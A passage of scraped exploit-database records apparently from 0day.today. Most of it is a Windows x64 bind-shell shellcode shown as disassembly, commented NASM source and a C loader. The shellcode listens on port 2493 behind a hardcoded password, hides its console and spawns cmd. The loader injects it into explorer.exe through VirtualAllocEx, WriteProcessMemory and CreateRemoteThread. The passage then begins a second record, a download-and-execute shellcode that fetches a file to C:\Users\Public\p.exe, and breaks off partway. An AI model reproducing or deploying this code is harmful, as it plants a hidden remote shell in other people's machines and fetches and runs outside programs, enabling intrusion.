%rax,-0x8(%r12)\r\n 147: 41 8b 5e 48 mov 0x48(%r14),%ebx\r\n 14b: 4c 01 fb add %r15,%rbx\r\n 14e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 153: 41 c7 04 24 2d 2d 3e movl 
$0x203e2d2d,(%r12)\r\n 15a: 20 \r\n 15b: 49 8d 14 24 lea (%r12),%rdx\r\n 15f: 6a 04 pushq $0x4\r\n 161: 41 58 pop %r8\r\n 163: 4d 31 c9 xor %r9,%r9\r\n 166: 48 83 ec 58 sub $0x58,%rsp\r\n 16a: ff d3 callq *%rbx\r\n 16c: 41 8b 5e 3c mov 0x3c(%r14),%ebx\r\n 170: 4c 01 fb add %r15,%rbx\r\n 173: 4d 31 c9 xor %r9,%r9\r\n 176: 6a 08 pushq $0x8\r\n 178: 41 58 pop %r8\r\n 17a: 49 8d 14 24 lea (%r12),%rdx\r\n 17e: 49 8b 4c 24 f8 mov -0x8(%r12),%rcx\r\n 183: ff d3 callq *%rbx\r\n 185: 41 81 3c 24 68 32 37 cmpl $0x31373268,(%r12)\r\n 18c: 31 \r\n 18d: 0f 85 7b ff ff ff jne 10e <kick>\r\n 193: 41 81 7c 24 04 35 30 cmpl $0x46383035,0x4(%r12)\r\n 19a: 38 46 \r\n 19c: 0f 85 6c ff ff ff jne 10e <kick>\r\n 1a2: 8b 5e 44 mov 0x44(%rsi),%ebx\r\n 1a5: 48 01 fb add %rdi,%rbx\r\n 1a8: ff d3 callq *%rbx\r\n 1aa: 48 31 d2 xor %rdx,%rdx\r\n 1ad: 41 c7 04 24 75 73 65 movl $0x72657375,(%r12)\r\n 1b4: 72 \r\n 1b5: 66 41 c7 44 24 04 33 movw $0x3233,0x4(%r12)\r\n 1bc: 32 \r\n 1bd: 41 88 54 24 06 mov %dl,0x6(%r12)\r\n 1c2: 49 8d 0c 24 lea (%r12),%rcx\r\n 1c6: 48 83 ec 58 sub $0x58,%rsp\r\n 1ca: 66 ba 40 03 mov $0x340,%dx\r\n 1ce: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 1d1: 48 01 fb add %rdi,%rbx\r\n 1d4: ff d3 callq *%rbx\r\n 1d6: 49 89 c6 mov %rax,%r14\r\n 1d9: 41 c7 04 24 46 69 6e movl $0x646e6946,(%r12)\r\n 1e0: 64 \r\n 1e1: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)\r\n 1e8: 6e 64 \r\n 1ea: 41 c7 44 24 08 6f 77 movl $0x4141776f,0x8(%r12)\r\n 1f1: 41 41 \r\n 1f3: 41 80 74 24 0b 41 xorb $0x41,0xb(%r12)\r\n 1f9: 48 31 d2 xor %rdx,%rdx\r\n 1fc: 66 ba 2c 09 mov $0x92c,%dx\r\n 200: 44 8b 2c 16 mov (%rsi,%rdx,1),%r13d\r\n 204: 49 01 fd add %rdi,%r13\r\n 207: 49 8d 14 24 lea (%r12),%rdx\r\n 20b: 4c 89 f1 mov %r14,%rcx\r\n 20e: 41 ff d5 callq *%r13\r\n 211: 48 31 d2 xor %rdx,%rdx\r\n 214: 41 c7 04 24 43 6f 6e movl $0x736e6f43,(%r12)\r\n 21b: 73 \r\n 21c: 41 c7 44 24 04 6f 6c movl $0x57656c6f,0x4(%r12)\r\n 223: 65 57 \r\n 225: 41 c7 44 24 08 69 6e movl $0x6f646e69,0x8(%r12)\r\n 22c: 64 6f \r\n 22e: 
41 c7 44 24 0c 77 43 movl $0x616c4377,0xc(%r12)\r\n 235: 6c 61 \r\n 237: 66 41 c7 44 24 10 73 movw $0x7373,0x10(%r12)\r\n 23e: 73 \r\n 23f: 41 88 54 24 12 mov %dl,0x12(%r12)\r\n 244: 49 8d 0c 24 lea (%r12),%rcx\r\n 248: 48 83 ec 58 sub $0x58,%rsp\r\n 24c: ff d0 callq *%rax\r\n 24e: 48 31 d2 xor %rdx,%rdx\r\n 251: 41 c7 04 24 53 68 6f movl $0x776f6853,(%r12)\r\n 258: 77 \r\n 259: 41 c7 44 24 04 57 69 movl $0x646e6957,0x4(%r12)\r\n 260: 6e 64 \r\n 262: 66 41 c7 44 24 08 6f movw $0x776f,0x8(%r12)\r\n 269: 77 \r\n 26a: 41 88 54 24 0a mov %dl,0xa(%r12)\r\n 26f: 49 8d 14 24 lea (%r12),%rdx\r\n 273: 4c 89 f1 mov %r14,%rcx\r\n 276: 41 55 push %r13\r\n 278: 5b pop %rbx\r\n 279: 49 89 c5 mov %rax,%r13\r\n 27c: ff d3 callq *%rbx\r\n 27e: 4c 89 e9 mov %r13,%rcx\r\n 281: 48 31 d2 xor %rdx,%rdx\r\n 284: ff d0 callq *%rax\r\n 286: 4d 31 c0 xor %r8,%r8\r\n 289: 41 50 push %r8\r\n 28b: 5a pop %rdx\r\n 28c: 66 ba 1f 04 mov $0x41f,%dx\r\n 290: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 293: 48 01 fb add %rdi,%rbx\r\n 296: 41 50 push %r8\r\n 298: 5a pop %rdx\r\n 299: b2 80 mov $0x80,%dl\r\n 29b: 49 8d 0c 24 lea (%r12),%rcx\r\n 29f: ff d3 callq *%rbx\r\n 2a1: 48 31 d2 xor %rdx,%rdx\r\n 2a4: 41 c7 44 24 f4 63 6d movl $0x41646d63,-0xc(%r12)\r\n 2ab: 64 41 \r\n 2ad: 41 88 54 24 f7 mov %dl,-0x9(%r12)\r\n 2b2: b2 68 mov $0x68,%dl\r\n 2b4: 49 89 14 24 mov %rdx,(%r12)\r\n 2b8: b2 ff mov $0xff,%dl\r\n 2ba: 48 ff c2 inc %rdx\r\n 2bd: 49 8b 44 24 f8 mov -0x8(%r12),%rax\r\n 2c2: 41 89 54 24 3c mov %edx,0x3c(%r12)\r\n 2c7: 49 89 44 24 50 mov %rax,0x50(%r12)\r\n 2cc: 49 89 44 24 58 mov %rax,0x58(%r12)\r\n 2d1: 49 89 44 24 60 mov %rax,0x60(%r12)\r\n 2d6: 48 83 ec 58 sub $0x58,%rsp\r\n 2da: 48 31 c9 xor %rcx,%rcx\r\n 2dd: 4d 31 c9 xor %r9,%r9\r\n 2e0: 6a 01 pushq $0x1\r\n 2e2: 41 58 pop %r8\r\n 2e4: 4c 89 44 24 20 mov %r8,0x20(%rsp)\r\n 2e9: 48 89 4c 24 28 mov %rcx,0x28(%rsp)\r\n 2ee: 48 89 4c 24 30 mov %rcx,0x30(%rsp)\r\n 2f3: 48 89 4c 24 38 mov %rcx,0x38(%rsp)\r\n 2f8: 49 8d 14 24 lea (%r12),%rdx\r\n 2fc: 
48 89 54 24 40 mov %rdx,0x40(%rsp)\r\n 301: 49 8d 54 24 68 lea 0x68(%r12),%rdx\r\n 306: 48 89 54 24 48 mov %rdx,0x48(%rsp)\r\n 30b: 4d 31 c0 xor %r8,%r8\r\n 30e: 49 8d 54 24 f4 lea -0xc(%r12),%rdx\r\n 313: 4d 31 d2 xor %r10,%r10\r\n 316: 66 41 ba 94 02 mov $0x294,%r10w\r\n 31b: 42 8b 1c 16 mov (%rsi,%r10,1),%ebx\r\n 31f: 48 01 fb add %rdi,%rbx\r\n 322: ff d3 callq *%rbx\r\n 324: 48 31 d2 xor %rdx,%rdx\r\n 327: 52 push %rdx\r\n 328: 66 ba 29 01 mov $0x129,%dx\r\n 32c: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 32f: 48 01 fb add %rdi,%rbx\r\n 332: 59 pop %rcx\r\n 333: 48 83 c4 58 add $0x58,%rsp\r\n 337: ff d3 callq *%rbx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n \r\n \r\n/*\r\n \r\nsection .text\r\n global _start\r\n_start:\r\n \r\n \r\ncdq\r\nmov dl, 128\r\n \r\nsub rsp,rdx\r\nlea r12,[rsp]\r\n \r\n \r\n \r\nxor rdx,rdx\r\n \r\nmov rax,[gs:rdx+0x60]\r\nmov rax,[rax+0x18]\r\nmov rsi,[rax+0x10]\r\nlodsq\r\nmov rsi,[rax]\r\nmov rdi,[rsi+0x30] ;kernel32.dll base address\r\n \r\n \r\n;-----------------------------------------\r\n \r\nmov dl,0x88\r\nmov ebx,[rdi+0x3c]\r\nadd rbx,rdi\r\nmov ebx,[rbx+rdx]\r\nadd rbx,rdi\r\n \r\n \r\nmov esi,[rbx+0x1c] ;kernel32.dll AddressOfFunctions\r\nadd rsi,rdi\r\n \r\n \r\n;=============================================MAIN CODE====================================================;\r\n \r\n \r\n \r\n;loading ws2_32.dll\r\n \r\nxor rdx,rdx\r\n \r\n \r\n \r\n \r\nmov [r12],dword 'ws2_'\r\nmov [r12+4],word '32'\r\nmov [r12+6],byte dl\r\n \r\nmov dx,832\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nlea rcx,[r12]\r\ncall rbx\r\n \r\nmov r15,rax ;ws2_32.dll base Address\r\n;---------------------------\r\nxor rdx,rdx\r\nmov dl,0x88\r\nmov ebx,[r15+0x3c]\r\nadd rbx,r15\r\nmov ebx,[rbx+rdx]\r\nadd rbx,r15\r\n \r\nmov r14d,[rbx+0x1c]\r\nadd r14,r15 ;ws2_32.dll AddressOfFunctions\r\n \r\n;---------------------------------------------\r\n;WSAStartup(514,&WSADATA)\r\n \r\n \r\n \r\nmov dx,114*4\r\nmov ebx,[r14+rdx]\r\nadd 
rbx,r15\r\n \r\nxor rcx,rcx\r\nmov cx,408\r\n \r\nsub rsp,rcx\r\nlea rdx,[rsp]\r\nmov cx,514\r\n \r\n \r\n \r\ncall rbx\r\n \r\n;---------------------------------------------\r\n;WSASocketA(2,1,6,0,0,0)\r\nsub rsp,88\r\nsub rsp,88\r\nxor rdx,rdx\r\nmov dx,98*4\r\nmov ebx,[r14+rdx]\r\nadd rbx,r15\r\n \r\npush 6\r\npush 1\r\npush 2\r\n \r\npop rcx\r\npop rdx\r\npop r8\r\n \r\nxor r9,r9\r\n \r\nmov [rsp+32],r9\r\nmov [rsp+40],r9\r\n \r\ncall rbx\r\n \r\nmov r13,rax ;SOCKET\r\n;----------------------------------------------------------------\r\n;--------------------------------------------------\r\nmov ebx,[r14+4]\r\nadd rbx,r15 ;bind()\r\n \r\n;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)\r\n \r\n \r\npush 16\r\npop r8\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12],rdx\r\nmov [r12+8],rdx\r\n \r\nmov [r12],byte 2\r\nmov [r12+2],word 0xbd09 ;port 2493 (change it if U want)\r\nlea rdx,[r12]\r\n \r\nmov rcx,r13\r\n \r\ncall rbx\r\n \r\n;---------------------------------------------------------\r\nmov ebx,[r14+48]\r\nadd rbx,r15 ;listen()\r\n \r\n;listen(SOCKET,1)\r\n \r\npush 1\r\npop rdx\r\n \r\nmov rcx,r13\r\ncall rbx\r\n \r\nsub rsp,88\r\n \r\njmp a\r\n;------------------------------------------------\r\n;-----------------------------------------\r\nkick:\r\nadd rsp,88\r\n \r\nmov ebx,[r14+8]\r\nadd rbx,r15 ;CloseSocket()\r\n \r\nmov rcx,[r12-8]\r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\n \r\n;-----------------------------------\r\na:\r\n \r\n \r\n \r\nmov ebx,[r14]\r\nadd rbx,r15 ;accept()\r\n \r\n;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12],rdx\r\nmov [r12+8],rdx\r\n \r\nmov dl,16\r\npush rdx\r\n \r\nlea r8,[rsp]\r\n \r\n \r\nlea rdx,[r12]\r\n \r\nmov rcx,r13\r\n \r\n \r\ncall rbx\r\n \r\nmov [r12-8],rax ;client socket\r\n;--------------------------\r\n;send(SOCKET,string,4,0)\r\nmov ebx,[r14+72]\r\nadd rbx,r15 ;send()\r\n \r\n \r\nmov rcx,[r12-8]\r\nmov [r12],dword 0x203e2d2d\r\nlea rdx,[r12]\r\n \r\npush byte 
4\r\npop r8\r\n \r\nxor r9,r9\r\nsub rsp,88\r\ncall rbx\r\n \r\n;-------------------------------------------\r\n \r\nmov ebx,[r14+60]\r\nadd rbx,r15 ;recv()\r\n \r\nxor r9,r9\r\npush byte 8\r\npop r8\r\nlea rdx,[r12]\r\nmov rcx,[r12-8]\r\ncall rbx\r\n \r\n;------------------------\r\n;password: h271508F\r\n \r\ncmp dword [r12],'h271'\r\njne kick\r\ncmp dword [r12+4],'508F'\r\njne kick\r\n \r\n \r\n \r\n;----------------------------------------------\r\n;hiding window \r\n \r\nmov ebx,[rsi+68]\r\nadd rbx,rdi\r\n \r\ncall rbx ;AllocConsole()\r\n \r\n;---------------------------------------\r\nxor rdx,rdx\r\n \r\n;loading user32.dll\r\nmov [r12],dword 'user'\r\nmov [r12+4],word '32'\r\nmov [r12+6],byte dl\r\n \r\nlea rcx,[r12]\r\n \r\nsub rsp,88 ;reserving memory for API \r\n \r\nmov dx,832\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\ncall rbx ;LoadLibraryA(\"user32\")\r\n \r\nmov r14,rax ;user32.dll base\r\n \r\n;----------------------------------------------------------------\r\n;--------------------------------------\r\n;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n;Finding address of FindWindowA()\r\nmov [r12],dword 'Find'\r\nmov [r12+4],dword 'Wind'\r\nmov [r12+8],dword 'owAA'\r\nxor byte [r12+11],0x41\r\n \r\nxor rdx,rdx\r\nmov dx,587*4\r\nmov r13d,[rsi+rdx]\r\nadd r13,rdi ;GetProcAddress() (temporary)\r\n \r\n \r\nlea rdx,[r12]\r\nmov rcx,r14\r\n \r\ncall r13\r\n \r\n;--------------------------------------\r\n;-------------------------------------------------\r\n \r\n;FindWindowA(\"ConsoleWindowClass\",NULL)\r\nxor rdx,rdx\r\n \r\nmov [r12],dword 'Cons'\r\nmov [r12+4],dword 'oleW'\r\nmov [r12+8],dword 'indo'\r\nmov [r12+12],dword 'wCla'\r\nmov [r12+16],word 'ss'\r\nmov [r12+18],byte dl\r\n \r\nlea rcx,[r12]\r\nsub rsp,88\r\ncall rax\r\n \r\n;----------------------------------\r\n;===========================================================\r\n \r\nxor rdx,rdx\r\n \r\n;finding Address of ShowWindow()\r\nmov [r12],dword 
'Show'\r\nmov [r12+4],dword 'Wind'\r\nmov [r12+8],word 'ow'\r\nmov [r12+10],byte dl\r\n \r\nlea rdx,[r12]\r\nmov rcx,r14\r\n \r\npush r13\r\npop rbx \r\n \r\nmov r13,rax ;HWND\r\n \r\ncall rbx\r\n \r\n;-------------------------------------\r\nmov rcx,r13\r\nxor rdx,rdx\r\n \r\ncall rax\r\n;----------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n;--------------------------------------\r\n;RtlFillMemory(address,length,fill)\r\nxor r8,r8\r\npush r8\r\npop rdx\r\n \r\nmov dx,1055\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\npush r8\r\npop rdx\r\n \r\nmov dl,128\r\n \r\nlea rcx,[r12]\r\n \r\ncall rbx\r\n;----------------------------------------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n;----------------------------------------------------------------\r\n \r\nxor rdx,rdx\r\n \r\nmov [r12-12],dword 'cmdA'\r\nmov [r12-9],byte dl\r\n \r\n \r\nmov dl,104\r\n \r\nmov [r12],rdx\r\nmov dl,255\r\ninc rdx\r\n \r\n \r\nmov rax,[r12-8]\r\n \r\nmov [r12+0x3c],edx\r\n \r\nmov [r12+0x50],rax\r\nmov [r12+0x58],rax\r\nmov [r12+0x60],rax\r\n \r\n;---------------------------------------------------\r\n;CreateProcessA(NULL,\"cmd\",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)\r\n \r\nsub rsp,88\r\n \r\nxor rcx,rcx\r\nxor r9,r9\r\n \r\n \r\npush 1\r\npop r8\r\n \r\nmov [rsp+32],r8\r\nmov [rsp+40],rcx\r\nmov [rsp+48],rcx\r\nmov [rsp+56],rcx\r\n \r\nlea rdx,[r12]\r\nmov [rsp+64],rdx\r\nlea rdx,[r12+104]\r\nmov [rsp+72],rdx\r\n \r\n \r\n \r\n \r\nxor r8,r8\r\nlea rdx,[r12-12]\r\n \r\nxor r10,r10\r\nmov r10w,165*4\r\nmov ebx,[rsi+r10]\r\nadd rbx,rdi ;CreateProcessA()\r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\n;------------------------------------------------------\r\n \r\n \r\n;------------------------------\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nxor rdx,rdx\r\npush rdx\r\n \r\nmov dx,297\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\npop rcx\r\nadd rsp,88\r\ncall 
rbx\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n#include<tlhelp32.h>\r\n \r\nchar shellcode[]=\\\r\n \r\n\"\\x99\\xb2\\x80\\x48\\x29\\xd4\\x4c\\x8d\\x24\\x24\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x70\\x10\\x48\\xad\\x48\\x8b\\x30\\x48\\x8b\\x7e\\x30\\xb2\\x88\\x8b\\x5f\\x3c\\x48\\x01\\xfb\\x8b\\x1c\\x13\\x48\\x01\\xfb\\x8b\\x73\\x1c\\x48\\x01\\xfe\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x77\\x73\\x32\\x5f\\x66\\x41\\xc7\\x44\\x24\\x04\\x33\\x32\\x41\\x88\\x54\\x24\\x06\\x66\\xba\\x40\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0c\\x24\\xff\\xd3\\x49\\x89\\xc7\\x48\\x31\\xd2\\xb2\\x88\\x41\\x8b\\x5f\\x3c\\x4c\\x01\\xfb\\x8b\\x1c\\x13\\x4c\\x01\\xfb\\x44\\x8b\\x73\\x1c\\x4d\\x01\\xfe\\x66\\xba\\xc8\\x01\\x41\\x8b\\x1c\\x16\\x4c\\x01\\xfb\\x48\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x8d\\x14\\x24\\x66\\xb9\\x02\\x02\\xff\\xd3\\x48\\x83\\xec\\x58\\x48\\x83\\xec\\x58\\x48\\x31\\xd2\\x66\\xba\\x88\\x01\\x41\\x8b\\x1c\\x16\\x4c\\x01\\xfb\\x6a\\x06\\x6a\\x01\\x6a\\x02\\x59\\x5a\\x41\\x58\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x4c\\x89\\x4c\\x24\\x28\\xff\\xd3\\x49\\x89\\xc5\\x41\\x8b\\x5e\\x04\\x4c\\x01\\xfb\\x6a\\x10\\x41\\x58\\x48\\x31\\xd2\\x49\\x89\\x14\\x24\\x49\\x89\\x54\\x24\\x08\\x41\\xc6\\x04\\x24\\x02\\x66\\x41\\xc7\\x44\\x24\\x02\\x09\\xbd\\x49\\x8d\\x14\\x24\\x4c\\x89\\xe9\\xff\\xd3\\x41\\x8b\\x5e\\x30\\x4c\\x01\\xfb\\x6a\\x01\\x5a\\x4c\\x89\\xe9\\xff\\xd3\\x48\\x83\\xec\\x58\\xeb\\x12\\x48\\x83\\xc4\\x58\\x41\\x8b\\x5e\\x08\\x4c\\x01\\xfb\\x49\\x8b\\x4c\\x24\\xf8\\xff\\xd3\\x41\\x8b\\x1e\\x4c\\x01\\xfb\\x48\\x31\\xd2\\x49\\x89\\x14\\x24\\x49\\x89\\x54\\x24\\x08\\xb2\\x10\\x52\\x4c\\x8d\\x04\\x24\\x49\\x8d\\x14\\x24\\x4c\\x89\\xe9\\xff\\xd3\\x49\\x89\\x44\\x24\\xf8\\x41\\x8b\\x5e\\x48\\x4c\\x01\\xfb\\x49\\x8b\\x4c\\x24\\xf8\\x41\\xc7\\x04\\
x24\\x2d\\x2d\\x3e\\x20\\x49\\x8d\\x14\\x24\\x6a\\x04\\x41\\x58\\x4d\\x31\\xc9\\x48\\x83\\xec\\x58\\xff\\xd3\\x41\\x8b\\x5e\\x3c\\x4c\\x01\\xfb\\x4d\\x31\\xc9\\x6a\\x08\\x41\\x58\\x49\\x8d\\x14\\x24\\x49\\x8b\\x4c\\x24\\xf8\\xff\\xd3\\x41\\x81\\x3c\\x24\\x68\\x32\\x37\\x31\\x0f\\x85\\x7b\\xff\\xff\\xff\\x41\\x81\\x7c\\x24\\x04\\x35\\x30\\x38\\x46\\x0f\\x85\\x6c\\xff\\xff\\xff\\x8b\\x5e\\x44\\x48\\x01\\xfb\\xff\\xd3\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x75\\x73\\x65\\x72\\x66\\x41\\xc7\\x44\\x24\\x04\\x33\\x32\\x41\\x88\\x54\\x24\\x06\\x49\\x8d\\x0c\\x24\\x48\\x83\\xec\\x58\\x66\\xba\\x40\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\xff\\xd3\\x49\\x89\\xc6\\x41\\xc7\\x04\\x24\\x46\\x69\\x6e\\x64\\x41\\xc7\\x44\\x24\\x04\\x57\\x69\\x6e\\x64\\x41\\xc7\\x44\\x24\\x08\\x6f\\x77\\x41\\x41\\x41\\x80\\x74\\x24\\x0b\\x41\\x48\\x31\\xd2\\x66\\xba\\x2c\\x09\\x44\\x8b\\x2c\\x16\\x49\\x01\\xfd\\x49\\x8d\\x14\\x24\\x4c\\x89\\xf1\\x41\\xff\\xd5\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x43\\x6f\\x6e\\x73\\x41\\xc7\\x44\\x24\\x04\\x6f\\x6c\\x65\\x57\\x41\\xc7\\x44\\x24\\x08\\x69\\x6e\\x64\\x6f\\x41\\xc7\\x44\\x24\\x0c\\x77\\x43\\x6c\\x61\\x66\\x41\\xc7\\x44\\x24\\x10\\x73\\x73\\x41\\x88\\x54\\x24\\x12\\x49\\x8d\\x0c\\x24\\x48\\x83\\xec\\x58\\xff\\xd0\\x48\\x31\\xd2\\x41\\xc7\\x04\\x24\\x53\\x68\\x6f\\x77\\x41\\xc7\\x44\\x24\\x04\\x57\\x69\\x6e\\x64\\x66\\x41\\xc7\\x44\\x24\\x08\\x6f\\x77\\x41\\x88\\x54\\x24\\x0a\\x49\\x8d\\x14\\x24\\x4c\\x89\\xf1\\x41\\x55\\x5b\\x49\\x89\\xc5\\xff\\xd3\\x4c\\x89\\xe9\\x48\\x31\\xd2\\xff\\xd0\\x4d\\x31\\xc0\\x41\\x50\\x5a\\x66\\xba\\x1f\\x04\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x41\\x50\\x5a\\xb2\\x80\\x49\\x8d\\x0c\\x24\\xff\\xd3\\x48\\x31\\xd2\\x41\\xc7\\x44\\x24\\xf4\\x63\\x6d\\x64\\x41\\x41\\x88\\x54\\x24\\xf7\\xb2\\x68\\x49\\x89\\x14\\x24\\xb2\\xff\\x48\\xff\\xc2\\x49\\x8b\\x44\\x24\\xf8\\x41\\x89\\x54\\x24\\x3c\\x49\\x89\\x44\\x24\\x50\\x49\\x89\\x44\\x24\\x58\\x49\\x89\\x44\\x24\\x60\\x48\\x83\\xec\\x58\\x48\\x31\\xc9\\x4d\\x31\\xc9\\x6a\\x01\\x41\\x58\\x4c\\x89\\
x44\\x24\\x20\\x48\\x89\\x4c\\x24\\x28\\x48\\x89\\x4c\\x24\\x30\\x48\\x89\\x4c\\x24\\x38\\x49\\x8d\\x14\\x24\\x48\\x89\\x54\\x24\\x40\\x49\\x8d\\x54\\x24\\x68\\x48\\x89\\x54\\x24\\x48\\x4d\\x31\\xc0\\x49\\x8d\\x54\\x24\\xf4\\x4d\\x31\\xd2\\x66\\x41\\xba\\x94\\x02\\x42\\x8b\\x1c\\x16\\x48\\x01\\xfb\\xff\\xd3\\x48\\x31\\xd2\\x52\\x66\\xba\\x29\\x01\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x59\\x48\\x83\\xc4\\x58\\xff\\xd3\";\r\n \r\n \r\nint main()\r\n{\r\n HANDLE s,proc;\r\n PROCESSENTRY32 ps;\r\n BOOL process_found=0;\r\n LPVOID shell;\r\n SIZE_T total;\r\n \r\n //finding explorer.exe pid\r\n \r\n ps.dwSize=sizeof(ps);\r\n \r\n s=CreateToolhelp32Snapshot(2,0);\r\n \r\n if(s==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"CreateToolhelp32Snapshot() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n if(!Process32First(s,&ps))\r\n {\r\n printf(\"Process32First() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n \r\n do{\r\n if(0==strcmp(ps.szExeFile,\"explorer.exe\"))\r\n {\r\n process_found=1;\r\n break;\r\n }\r\n }while(Process32Next(s,&ps));\r\n \r\n \r\n if(!process_found)\r\n {\r\n printf(\"Unknown Process\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n //opening process using pid \r\n \r\n \r\n proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);\r\n \r\n if(proc==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"OpenProcess() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n } \r\n \r\n \r\n //allocating memory process memory\r\n \r\n if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)\r\n {\r\n printf(\"Failed to allocate memory into process\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //writing shellcode into process memory\r\n \r\n WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);\r\n \r\n if(sizeof(shellcode)!=total)\r\n {\r\n printf(\"Failed write shellcode into process memory\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n 
//Executing shellcode\r\n \r\n if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)\r\n {\r\n printf(\"Failed to Execute shellcode\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n CloseHandle(proc);\r\n CloseHandle(s);\r\n \r\n return 0;\r\n \r\n \r\n}\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26603"}, {"lastseen": "2018-01-02T15:06:42", "references": [], "description": "Exploit for win64 platform in category shellcode", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2016-11-24T00:00:00", "title": "Windows/x64 - Download & Execute Shellcode (358 bytes)", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T15:06:42", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26407", "href": "https://0day.today/exploit/description/26407", "sourceData": "/*\r\n \r\n # Title : Windows x64 Download+Execute Shellcode\r\n # Author : Roziul Hasan Khan Shifat\r\n # Date : 24-11-2016\r\n # size : 358 bytes\r\n # Tested on : Windows 7 x64 Professional\r\n # Email : [email\u00a0protected] \r\n \r\n*/\r\n \r\n \r\n/*\r\n \r\n \r\nsection .text\r\n global _start\r\n_start:\r\n \r\n \r\n;-----------------------------\r\n \r\nsub rsp,88\r\n \r\nlea r14,[rsp]\r\nsub rsp,88\r\n \r\n \r\n;------------------------------------------------\r\n \r\n \r\nxor rdx,rdx\r\nmov rax,[gs:rdx+0x60] ;PEB\r\nmov rsi,[rax+0x18] ;PEB.Ldr\r\nmov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList\r\nlodsq\r\nmov rsi,[rax]\r\nmov rdi,[rsi+0x30] ;kernel32.dll base address\r\n \r\n;---------------------------------------------------\r\n \r\n \r\nmov ebx,[rdi+0x3c] ;elf_anew\r\nadd rbx,rdi\r\nmov dl,0x88\r\nmov ebx,[rbx+rdx]\r\nadd rbx,rdi\r\n \r\nmov esi,[rbx+0x1c]\r\nadd rsi,rdi\r\n;--------------------------------------------------\r\n \r\n;loading urlmon.dll\r\n 
\r\nmov dx,831\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nxor rdx,rdx\r\n \r\n \r\nmov [r14],dword 'urlm'\r\nmov [r14+4],word 'on'\r\nmov [r14+6],byte dl\r\n \r\nlea rcx,[r14]\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\nmov dx,586\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nxor rdx,rdx\r\n \r\nmov rcx,'URLDownl'\r\nmov [r14],rcx\r\nmov rcx,'oadToFil'\r\nmov [r14+8],rcx\r\nmov [r14+16],word 'eA'\r\nmov [r14+18],byte dl\r\n \r\n \r\nlea rdx,[r14]\r\nmov rcx,rax\r\n \r\ncall rbx\r\n;;;;;;;;;;;;;;;;;;;;;;-------------------------------------\r\n \r\nmov r15,rax\r\n \r\n;------------------------------------------------\r\n;save as 'C:\\\\Users\\\\Public\\\\p.exe' length: 24+1\r\n \r\nmov rax,'C:\\\\User'\r\nmov [r14],rax\r\nmov rax,'s\\\\Publi'\r\nmov [r14+8],rax\r\nmov rax,'c\\\\p.exe'\r\nmov [r14+16],rax\r\n \r\nxor rdx,rdx\r\nmov 